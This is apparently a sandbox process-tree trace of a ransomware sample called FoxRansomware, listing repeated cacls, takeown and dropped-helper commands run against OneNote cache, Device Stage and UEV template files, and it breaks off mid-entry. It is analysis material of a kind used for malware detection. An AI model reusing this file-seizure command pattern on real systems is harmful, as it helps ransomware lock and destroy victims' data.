C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006S.bin""2⤵PID:8096
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006S.bin" /E /G Admin:F /C3⤵PID:5184
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006S.bin"3⤵PID:5216
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000006S.bin" -nobanner3⤵PID:4572
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "0000006S.bin" -nobanner4⤵PID:1008
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2188
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000076.bin""2⤵PID:2620
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000076.bin" /E /G Admin:F /C3⤵PID:6100
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000076.bin"3⤵PID:7276
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "00000076.bin" -nobanner3⤵PID:5328
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "00000076.bin" -nobanner4⤵PID:7204
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6164
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007G.bin""2⤵PID:1504
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007G.bin" /E /G Admin:F /C3⤵PID:7280
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007G.bin"3⤵PID:6180
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000007G.bin" -nobanner3⤵PID:5332
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "0000007G.bin" -nobanner4⤵PID:7328
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6244
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007Q.bin""2⤵PID:7388
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007Q.bin" /E /G Admin:F /C3⤵PID:7364
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007Q.bin"3⤵
- Modifies file permissions
PID:7292
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000007Q.bin" -nobanner3⤵PID:7672
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "0000007Q.bin" -nobanner4⤵PID:7968
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:696
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008F.bin""2⤵PID:7396
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008F.bin" /E /G Admin:F /C3⤵PID:8044
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008F.bin"3⤵PID:7884
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000008F.bin" -nobanner3⤵PID:7908
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "0000008F.bin" -nobanner4⤵PID:7332
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7736
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000095.bin""2⤵PID:7732
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000095.bin" /E /G Admin:F /C3⤵PID:7948
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000095.bin"3⤵PID:8080
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "00000095.bin" -nobanner3⤵PID:7500
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "00000095.bin" -nobanner4⤵PID:7496
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7936
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A0.bin""2⤵PID:8188
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A0.bin" /E /G Admin:F /C3⤵PID:5480
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A0.bin"3⤵PID:4828
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "000000A0.bin" -nobanner3⤵PID:2980
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "000000A0.bin" -nobanner4⤵PID:6652
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6576
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""2⤵PID:4548
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C3⤵PID:6936
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"3⤵
- Modifies file permissions
PID:8172
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "device.png" -nobanner3⤵PID:5804
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "device.png" -nobanner4⤵PID:5864
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7068
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml""2⤵PID:6544
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml" /E /G Admin:F /C3⤵PID:6740
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml"3⤵
- Modifies file permissions
PID:6524
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "resource.xml" -nobanner3⤵PID:4752
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "resource.xml" -nobanner4⤵PID:6860
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6680
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml""2⤵PID:5768
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml" /E /G Admin:F /C3⤵PID:4064
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml"3⤵PID:6996
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "tasks.xml" -nobanner3⤵PID:5336
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "tasks.xml" -nobanner4⤵PID:6804
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6700
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml""2⤵PID:6520
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml" /E /G Admin:F /C3⤵PID:2408
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml"3⤵PID:6884
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "DesktopSettings2013.xml" -nobanner3⤵PID:6484
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "DesktopSettings2013.xml" -nobanner4⤵PID:6624
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6892
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml""2⤵PID:6920
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml" /E /G Admin:F /C3⤵PID:1492
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml"3⤵PID:5756
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftOffice2013BackupWin32.xml" -nobanner3⤵PID:4664
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MicrosoftOffice2013BackupWin32.xml" -nobanner4⤵PID:7876
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2348
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml""2⤵PID:3088
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml" /E /G Admin:F /C3⤵PID:4536
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml"3⤵PID:5204
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftOutlook2013CAWin32.xml" -nobanner3⤵PID:4272
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MicrosoftOutlook2013CAWin32.xml" -nobanner4⤵PID:5220
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4432
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\VdiState.xml""2⤵PID:7120
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\VdiState.xml" /E /G Admin:F /C3⤵PID:5492
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\VdiState.xml"3⤵PID:5372
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "VdiState.xml" -nobanner3⤵PID:7404
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "VdiState.xml" -nobanner4⤵PID:4188
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7112
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.32ca1135-9c4b-491d-a58c-7134046f09cb.2.etl""2⤵PID:1076
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.32ca1135-9c4b-491d-a58c-7134046f09cb.2.etl" /E /G Admin:F /C3⤵PID:2984
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.32ca1135-9c4b-491d-a58c-7134046f09cb.2.etl"3⤵PID:5436
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MoUsoCoreWorker.32ca1135-9c4b-491d-a58c-7134046f09cb.2.etl" -nobanner3⤵PID:388
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MoUsoCoreWorker.32ca1135-9c4b-491d-a58c-7134046f09cb.2.etl" -nobanner4⤵PID:6016
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4912
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""2⤵PID:6816
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C3⤵PID:2920
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"3⤵PID:5612
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "superbar.png" -nobanner3⤵PID:4316
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "superbar.png" -nobanner4⤵PID:6872
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4364
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml""2⤵PID:5324
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" /E /G Admin:F /C3⤵PID:5716
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml"3⤵
- Modifies file permissions
PID:6308
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "resource.xml" -nobanner3⤵PID:2992
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "resource.xml" -nobanner4⤵PID:4836
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2788
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml""2⤵PID:6864
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml" /E /G Admin:F /C3⤵PID:3652
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml"3⤵
- Modifies file permissions
PID:5796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftInternetExplorer2013.xml" -nobanner3⤵PID:5656
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MicrosoftInternetExplorer2013.xml" -nobanner4⤵PID:1416
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1192
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml""2⤵PID:5660
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml" /E /G Admin:F /C3⤵PID:4576
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml"3⤵PID:6580
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftOffice2013Office365Win32.xml" -nobanner3⤵PID:1676
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MicrosoftOffice2013Office365Win32.xml" -nobanner4⤵PID:6572
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2628
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml""2⤵PID:4348
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml" /E /G Admin:F /C3⤵PID:1528
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml"3⤵PID:2392
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftOutlook2016CAWin32.xml" -nobanner3⤵PID:6744
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MicrosoftOutlook2016CAWin32.xml" -nobanner4⤵PID:5100
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5448
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd""2⤵PID:5940
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd" /E /G Admin:F /C3⤵PID:5808
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd"3⤵
- Modifies file permissions
PID:4768
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner3⤵PID:1440
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner4⤵PID:7624
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6940
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000007.bin""2⤵PID:5356
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000007.bin" /E /G Admin:F /C3⤵PID:7608
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000007.bin"3⤵PID:6236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "00000007.bin" -nobanner3⤵PID:1684
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "00000007.bin" -nobanner4⤵PID:7808
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5884
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000L.bin""2⤵PID:6240
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1448
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000L.bin" /E /G Admin:F /C3⤵PID:6200
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000L.bin"3⤵
- Modifies file permissions
PID:7196
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000000L.bin" -nobanner3⤵PID:2968
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "0000000L.bin" -nobanner4⤵PID:6196
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5216
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000V.bin""2⤵PID:3248
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000V.bin" /E /G Admin:F /C3⤵PID:5972
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000V.bin"3⤵
- Modifies file permissions
PID:8096
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000000V.bin" -nobanner3⤵PID:564
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "0000000V.bin" -nobanner4⤵PID:6264
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3752
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006L.bin""2⤵PID:7304
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:7204
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006L.bin" /E /G Admin:F /C3⤵PID:4468
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006L.bin"3⤵PID:6076
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000006L.bin" -nobanner3⤵PID:7300
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "0000006L.bin" -nobanner4⤵PID:7436
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6316
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007T.bin""2⤵PID:5984
-
